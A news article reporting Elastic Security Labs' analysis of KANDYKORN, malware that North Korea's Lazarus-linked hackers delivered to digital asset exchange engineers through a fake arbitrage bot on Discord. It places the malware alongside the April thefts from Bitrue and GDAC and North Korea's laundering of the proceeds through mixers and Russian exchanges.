KANDYKORN malware use by North Korean hackers targeting digital asset exchange engineers

Getting your Trinity Audio player ready...

Hackers allied to the Lazarus Group targeted a digital asset exchange in April with new malware dubbed ‘KANDYKORN,’ a new report has revealed.

The Dutch firm Elastic Security Labs revealed that the attackers lured the engineers of an unnamed digital asset exchange via a public Discord channel. They led the victims to believe they were downloading an arbitrage bot.

However, upon decompressing, the ZIP archive revealed a ‘Main.py’ script and an accompanying folder containing over a dozen other malicious Python scripts.

The chain unraveled quickly, initializing a Google Drive URL from which it downloaded malicious content. The five-stage infiltration ended up in the installation of KANDYKORN, a malware that gave the attackers advanced data access capabilities, revealed Elastic.

“KANDYKORN is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes reflective loading, a direct-memory form of execution that may bypass detections,” the report summarizes.

Elastic didn’t reveal the identity of the exchange the hackers targeted, but it disclosed the attack was in April. That month, the biggest attack on a digital asset exchange was on Bitrue, a Singaporean entity that lost $23 million to the attack. Bitrue didn’t reveal further details about the attack but claimed that the hackers stole less than 5% of total assets and that only its hot wallets had been compromised.

South Korean exchange GDAC also suffered a breach, losing $13 million. The hackers later laundered the proceeds through Tornado Cash, the Ethereum-based mixer whose founders were arrested and charged with conspiracy to commit money laundering and evade sanctions.

“The DPRK, via units like the LAZARUS GROUP, continues to target crypto-industry businesses with the goal of stealing cryptocurrency in order to circumvent international sanctions that hinder the growth of their economy and ambitions,” Elastic added.

North Korea has long relied on mixers to cash out its ill-gotten proceeds. However, in recent times, the country’s hackers have reportedly turned to Russian exchanges as ties between the two nations grow tighter.

According to Chainalysis, there has been a “significant escalation in the partnership between the cyber underworlds of these two nations.” And with Russia known for being notoriously uncooperative with international law enforcement agencies, Korean hackers could have an extra layer to hide under.

Watch: BSV provides solutions for cybersecurity & fraud